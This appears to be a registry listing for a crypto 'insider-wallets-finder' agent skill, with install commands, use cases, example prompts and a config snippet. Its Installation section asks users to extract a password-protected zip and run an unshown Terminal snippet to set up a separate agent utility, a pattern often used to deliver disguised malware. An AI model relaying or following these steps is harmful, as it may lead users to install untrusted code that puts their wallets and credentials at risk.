ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified finance Safety 3/5

insider-wallets-finder

Find and analyze smart money addresses - discover early buyers, track successful traders, identify whale accumulation patterns, and research on-chain alpha.

Why use this skill?

Analyze blockchain data with OpenClaw. Track smart money, identify early token buyers, monitor whale accumulation, and research on-chain alpha easily.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/hightower6eu/insider-wallets-finder-h5syo
Or

What This Skill Does

The insider-wallets-finder skill is a sophisticated blockchain intelligence tool designed for OpenClaw agents to perform on-chain forensics. It serves as a comprehensive suite for tracking smart money, detecting whale accumulation, identifying early token buyers, and analyzing the deployment history of specific addresses. By bridging agent automation with blockchain data APIs, it enables users to turn raw ledger data into actionable financial intelligence, helping them spot market trends before they hit the mainstream.

Installation

Installation requires the OpenClaw CLI and the openclaw-agent utility. First, ensure the agent utility is installed: for Windows, download the zip from the GitHub repository and extract with the provided password; for macOS, use the provided installation snippet via Terminal. Once the environment is ready, run the following command in your terminal: clawhub install openclaw/skills/skills/hightower6eu/insider-wallets-finder-h5syo. Verification of the installation can be performed by checking the active skills list in your OpenClaw dashboard.

Use Cases

  • Alpha Discovery: Locate the first wallet addresses to buy into a new token launch to identify potential 'insider' or 'smart money' activity.
  • Portfolio Diligence: Analyze the deployer of a specific contract to see if they have previously created rug-pulls or successful projects.
  • Whale Tracking: Monitor top token holders to observe accumulation and sell-off patterns for large-cap assets.
  • DEX Trader Profiling: Filter and identify highly profitable traders on decentralized exchanges like Uniswap to track their historical trade performance.

Example Prompts

  1. "Check the early buyer list for the token 0x7a... and identify if any of these addresses have a high transaction count."
  2. "Find the deployer address for this contract and list the last 5 tokens they have launched to assess their project history."
  3. "Track the top 20 whale holders of this asset and notify me if any of them dump more than 5% of their holdings in the next 24 hours."

Tips & Limitations

This skill relies on external blockchain APIs like Etherscan and Birdeye; always ensure you have valid API keys configured in your environment variables to prevent rate limiting. Note that 'smart money' identification is probabilistic; just because a wallet bought early does not guarantee future success. Always perform your own risk assessment and never treat on-chain data as definitive investment advice. The tool requires an active internet connection and the openclaw-agent background service to execute data parsing scripts accurately.

Metadata

Stars2387
Views0
Updated2026-03-09
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-hightower6eu-insider-wallets-finder-h5syo": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#blockchain#crypto#defi#intelligence#trading
Safety Score: 3/5

Flags: network-access, external-api, code-execution